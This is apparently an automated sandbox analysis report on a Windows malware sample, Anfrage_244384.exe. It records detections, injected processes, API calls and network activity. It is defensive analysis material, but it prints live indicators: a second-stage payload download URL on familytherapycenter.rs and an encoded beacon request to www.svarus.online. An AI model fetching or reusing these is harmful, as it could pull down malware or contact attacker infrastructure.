Windows Analysis Report
Anfrage_244384.exe

AV Detection

Source: Anfrage_244384.exe

Avira: detected

Source: Yara match	File source: 00000007.00000002.3362363415.0000000000960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3362535904.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3361838593.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3122242151.0000000034330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3123079037.0000000035D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3362392086.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Compliance

Source: Anfrage_244384.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.40.95.144:443 -> 192.168.2.6:49927 version: TLS 1.2

Source: Anfrage_244384.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: Anfrage_244384.exe, 00000004.00000001.2596303421.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: dptLotHBnXg.exe, 00000006.00000000.3013372549.00000000009CE000.00000002.00000001.01000000.00000009.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174453120.00000000009CE000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: wntdll.pdbUGP source: Anfrage_244384.exe, 00000004.00000003.2992504596.00000000342E0000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000003.2995103933.0000000034492000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3106086622.00000000043B3000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3098948159.0000000004205000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Anfrage_244384.exe, Anfrage_244384.exe, 00000004.00000003.2992504596.00000000342E0000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000003.2995103933.0000000034492000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, verclsid.exe, 00000007.00000003.3106086622.00000000043B3000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3098948159.0000000004205000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: verclsid.pdbGCTL source: Anfrage_244384.exe, 00000004.00000002.3092495841.00000000043DF000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3092495841.000000000441D000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000002.3361641901.000000000140E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: Anfrage_244384.exe, 00000004.00000001.2596303421.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: verclsid.pdb source: Anfrage_244384.exe, 00000004.00000002.3092495841.00000000043DF000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3092495841.000000000441D000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000002.3361641901.000000000140E000.00000004.00000020.00020000.00000000.sdmp

Spreading

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 0_2_00405665 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,		0_2_00405665
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 0_2_0040270B FindFirstFileA,		0_2_0040270B
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 0_2_004060C7 FindFirstFileA,FindClose,		0_2_004060C7
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003CC460 FindFirstFileW,FindNextFileW,FindClose,		7_2_003CC460

Software Vulnerabilities

Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 4x nop then xor eax, eax		7_2_003B9DF0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 4x nop then mov ebx, 00000004h		7_2_048B04E8

Networking

Source: Joe Sandbox View	IP Address: 188.40.95.144 188.40.95.144
Source: Joe Sandbox View	IP Address: 194.58.112.174 194.58.112.174

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:49753
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:49926
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49927 -> 188.40.95.144:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /LxuQG254.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: familytherapycenter.rsCache-Control: no-cache

Source: global traffic

HTTP traffic detected: GET /sa87/?LJ=0zbXYrx&6X64=UqcT3NX6Xc6Oa5c5HtJN6Sm3jRGrdUDSppl2CYCGZerglEzU6CQj7u00+cYUshbCTVWQ/5Gc6Lshk9bP6yg8AmPqwLiPHc0f1bybms24K+7m7zNAaNQIZa1j2XstdwJ+GTV4HpA= HTTP/1.1Host: www.svarus.onlineAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: familytherapycenter.rs
Source: global traffic	DNS traffic detected: DNS query: www.svarus.online

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 15:12:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 34 65 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 73 76 61 72 75 73 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 8

Source: verclsid.exe, 00000007.00000002.3363414248.0000000004C3C000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362682978.0000000004300000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174698379.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, Anfrage_244384.exe	String found in binary or memory: http://crl.apple.com/root.crl0
Source: verclsid.exe, 00000007.00000002.3363414248.0000000004C3C000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362682978.0000000004300000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174698379.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, Anfrage_244384.exe	String found in binary or memory: http://crl.apple.com/timestamp.crl0
Source: Anfrage_244384.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Anfrage_244384.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: verclsid.exe, 00000007.00000002.3363414248.0000000004C3C000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362682978.0000000004300000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174698379.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, Anfrage_244384.exe	String found in binary or memory: http://www.apple.com/appleca0
Source: Anfrage_244384.exe, 00000004.00000001.2596303421.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: Anfrage_244384.exe, 00000004.00000001.2596303421.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Anfrage_244384.exe, 00000004.00000001.2596303421.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://familytherapycenter.rs/
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3092148007.0000000004378000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3092816967.00000000046B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://familytherapycenter.rs/LxuQG254.bin
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.0000000004378000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://familytherapycenter.rs/LxuQG254.bin2
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://familytherapycenter.rs/LxuQG254.binA
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://familytherapycenter.rs/LxuQG254.bink
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.0000000004378000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://familytherapycenter.rs/LxuQG254.binl
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://familytherapycenter.rs/LxuQG254.bins
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
Source: Anfrage_244384.exe, 00000004.00000001.2596303421.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: verclsid.exe, 00000007.00000002.3361368137.000000000083A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20M
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: verclsid.exe, 00000007.00000003.3288064546.00000000076CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10334
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.svarus.online&rand=
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://reg.ru
Source: verclsid.exe, 00000007.00000002.3363414248.0000000004C3C000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362682978.0000000004300000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174698379.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, Anfrage_244384.exe	String found in binary or memory: https://www.apple.com/appleca/0
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_se
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_n
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_host
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/sozdanie-saita/
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.svarus.online&reg_source=parking_auto

Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927

Source: unknown

HTTPS traffic detected: 188.40.95.144:443 -> 192.168.2.6:49927 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 0_2_0040511A GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040511A

E-Banking Fraud

Source: Yara match	File source: 00000007.00000002.3362363415.0000000000960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3362535904.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3361838593.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3122242151.0000000034330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3123079037.0000000035D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3362392086.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B35C0 NtCreateMutant,LdrInitializeThunk,		4_2_346B35C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2C70 NtFreeVirtualMemory,LdrInitializeThunk,		4_2_346B2C70
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2DF0 NtQuerySystemInformation,LdrInitializeThunk,		4_2_346B2DF0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B3010 NtOpenDirectoryObject,		4_2_346B3010
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B3090 NtSetValueKey,		4_2_346B3090
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B3D70 NtOpenThread,		4_2_346B3D70
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B3D10 NtOpenProcessToken,		4_2_346B3D10
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B39B0 NtGetContextThread,		4_2_346B39B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B4650 NtSuspendThread,		4_2_346B4650
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B4340 NtSetContextThread,		4_2_346B4340
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2C60 NtCreateKey,		4_2_346B2C60
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2C00 NtQueryInformationProcess,		4_2_346B2C00
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2CF0 NtOpenProcess,		4_2_346B2CF0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2CC0 NtQueryVirtualMemory,		4_2_346B2CC0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2CA0 NtQueryInformationToken,		4_2_346B2CA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2D30 NtUnmapViewOfSection,		4_2_346B2D30
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2D00 NtSetInformationFile,		4_2_346B2D00
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2D10 NtMapViewOfSection,		4_2_346B2D10
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2DD0 NtDelayExecution,		4_2_346B2DD0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2DB0 NtEnumerateKey,		4_2_346B2DB0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2E30 NtWriteVirtualMemory,		4_2_346B2E30
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2EE0 NtQueueApcThread,		4_2_346B2EE0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2EA0 NtAdjustPrivilegesToken,		4_2_346B2EA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2E80 NtReadVirtualMemory,		4_2_346B2E80
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2F60 NtCreateProcessEx,		4_2_346B2F60
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2F30 NtCreateSection,		4_2_346B2F30
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2FE0 NtCreateFile,		4_2_346B2FE0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2FA0 NtQuerySection,		4_2_346B2FA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2FB0 NtResumeThread,		4_2_346B2FB0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2F90 NtProtectVirtualMemory,		4_2_346B2F90
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2AF0 NtWriteFile,		4_2_346B2AF0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2AD0 NtReadFile,		4_2_346B2AD0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2AB0 NtWaitForSingleObject,		4_2_346B2AB0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2B60 NtClose,		4_2_346B2B60
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2BE0 NtQueryValueKey,		4_2_346B2BE0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2BF0 NtAllocateVirtualMemory,		4_2_346B2BF0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2BA0 NtEnumerateValueKey,		4_2_346B2BA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2B80 NtQueryInformationFile,		4_2_346B2B80
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D4650 NtSuspendThread,LdrInitializeThunk,		7_2_045D4650
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D4340 NtSetContextThread,LdrInitializeThunk,		7_2_045D4340
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2C70 NtFreeVirtualMemory,LdrInitializeThunk,		7_2_045D2C70
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2C60 NtCreateKey,LdrInitializeThunk,		7_2_045D2C60
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2CA0 NtQueryInformationToken,LdrInitializeThunk,		7_2_045D2CA0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2D10 NtMapViewOfSection,LdrInitializeThunk,		7_2_045D2D10
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2D30 NtUnmapViewOfSection,LdrInitializeThunk,		7_2_045D2D30
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2DD0 NtDelayExecution,LdrInitializeThunk,		7_2_045D2DD0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2DF0 NtQuerySystemInformation,LdrInitializeThunk,		7_2_045D2DF0
